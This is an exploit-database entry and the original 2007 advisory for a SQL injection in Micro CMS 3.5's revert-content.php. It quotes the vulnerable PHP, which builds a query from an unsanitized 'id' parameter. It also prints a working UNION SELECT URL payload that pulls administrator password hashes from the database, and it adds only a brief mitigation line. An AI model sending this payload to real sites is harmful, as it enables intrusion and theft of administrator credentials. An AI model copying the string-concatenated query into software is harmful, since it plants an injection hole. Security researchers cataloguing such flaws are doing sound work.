Micro CMS 3.5 SQL Injection

vendor:

Micro CMS

by:

notsec.com

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Micro CMS

Affected Version From: Micro CMS 3.5

Affected Version To: Micro CMS 3.5

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Micro CMS 3.5 SQL Injection

The Micro CMS 3.5 application is vulnerable to SQL injection. An attacker can exploit this vulnerability by injecting malicious SQL code into the 'id' parameter in the 'revert-content.php' file. This allows the attacker to bypass authentication and retrieve sensitive information from the database. The specific exploit for this vulnerability is: 'http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,SUBSTRING(administrators_pass,1,16),null,null%20FROM%20microcms_administrators/*'.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#########################################################################################
#
#                        not sec group
#        http://www.notsec.com     info@notsec.com
#
# [Micro CMS 3.5]
#
# Class:     SQL Injection
# Found:     28/08/2007
# Remote:    Yes
# Site:
http://www.impliedbydesign.com/ibd-micro-cms-static-content-manager.html
# Download:  http://www.impliedbydesign.com/apps/microcms/microcms.zip
# Demo site:
http://www.impliedbydesign.com/micro-cms-content-management-demo.php
#
#########################################################################################


       Vulnerable code:
       cms/revert-content.php
============================================================================================================
$sql = '        SELECT *
           FROM microcms_content_blurb_history
           WHERE content_blurbs_variable = "' . $_GET['id'] . '"
           ORDER BY content_blurb_history_version_num DESC
           LIMIT 1';
$result = mysql_query($sql);
============================================================================================================


       Exploit :
============================================================================================================================================================================================
http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,SUBSTRING(administrators_pass,1,16),null,null%20FROM%20microcms_administrators/*
============================================================================================================================================================================================


       Thanks To:
=========================
All notsec.com members;
White_Sheep for Bugs Hunter;
=========================
# notsec.com

# milw0rm.com [2007-08-28]